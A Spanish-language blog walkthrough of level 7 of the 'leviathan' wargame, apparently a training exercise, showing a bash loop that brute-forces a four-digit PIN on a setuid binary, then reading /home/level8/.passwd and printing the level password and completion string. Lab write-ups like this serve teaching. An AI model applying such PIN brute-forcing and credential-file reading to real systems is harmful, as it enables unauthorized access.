systemadmin.es > Seguridad > Wargame leviathan: nivel 7

Wargame leviathan: nivel 7

Para este último nivel veremos como hacer un ataque de fuerza bruta contra un binario que nos pide una contraseña corta:

Si ejecutamos el binario de este nivel sin argumentos nos indica que la contraseña es un conjunto de cuatro números:

level7@leviathan:~$ /wargame/sphinx 
usage: /wargame/sphinx <4 digit code>

Si introducimos unos cualquieras nos indica el error:

level7@leviathan:~$ /wargame/sphinx 1234
Wrong

Mediante seq podemos generar todas las contraseñas posibles para ir probando con todas ellas. Con grep quitamos todos los Wrong que nos van a ir saliendo:

level7@leviathan:~$ for i in $(seq -w 0 9999); do /wargame/sphinx $i | grep -v Wrong; done
sh-3.1$ cat /home/level8/.passwd 
sh-3.1$ FsnC0xl7

Para ver cual era la contraseña podemos verlo con un ps:

sh-3.1$ ps -u level8 -o command
sh-3.1$ COMMAND
/wargame/sphinx 7123
/bin/sh
ps -u level8 -o command

Al entrar en el nivel 8 con la contraseña que hemos descubierto (FsnC0xl7 encontramos el CONGRATULATIONS que nos fa el string que finaliza el wargame:

level8@leviathan:~$ cat CONGRATULATIONS 
Well Done, you seem to have used *nix system before, now try something more serious. Your completion string is "Unix is easy!!!".

Otros niveles de este wargame:

Deja un comentario:

XHTML - Tags permitidos:<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>